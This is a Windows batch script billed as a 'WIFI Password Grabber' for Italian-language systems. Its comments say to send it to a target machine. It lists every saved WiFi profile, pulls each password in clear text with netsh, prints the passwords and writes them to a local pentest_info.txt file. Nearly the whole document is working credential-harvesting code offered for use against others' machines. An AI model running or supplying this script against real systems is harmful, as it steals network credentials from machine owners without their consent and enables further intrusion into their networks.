   @echo off
   :: WIFI Password Grabber.
   :: Tested on Win10 Pro 21H1
   :: Warning!! This code works only in Windows with Italian language.
   :: usage = send file to target machine ( use loki ).
   
   setlocal enabledelayedexpansion
   set datanow=%time% %date%
   title Scan WiFi Accounts and Password
   echo.
   echo [...] [%datanow%] Scan all saved WiFi accounts and passwords:
   echo [...] [%datanow%] All saved WiFi accounts and passwords >> ./pentest_info.txt
   rem Get all the profiles
   call :get-profiles r

   rem For each profile, try to get the password
   :main-next-profile
	for /f "tokens=1* delims=," %%a in ("%r%") do (
            call :get-profile-key "%%a" key
            if "!key!" NEQ "" (
                echo [...] Found: [%%a] Password: [!key!]
                echo [...] Found: [%%a] Password: [!key!] >> .\pentest_info.txt

            )
            set r=%%b
        )
        if "%r%" NEQ "" goto main-next-profile

    echo.
    pause


rem
rem Get the WiFi key of a given profile
rem
:get-profile-key <1=profile-name> <2=out-profile-key>
    setlocal
    set result=
    FOR /F "usebackq tokens=2 delims=:" %%a in (
        `netsh wlan show profile name^="%~1" key^=clear ^| findstr /C:"Contenuto chiave"`) DO (
        set result=%%a
        set result=!result:~1!
    )
    (
        endlocal
        set %2=%result%
    )

    goto :eof


rem Get all network profiles (comma separated) into the result result-variable
:get-profiles <1=result-variable>
    setlocal
    set result=
    FOR /F "usebackq tokens=2 delims=:" %%a in (
        `netsh wlan show profiles ^| findstr /C:"Tutti i profili utente"`) DO (
        set val=%%a
        set val=!val:~1!
        set result=%!val!,!result!
    )
    (
        endlocal
        set %1=%result:~0,-1%
    )
    goto :eof
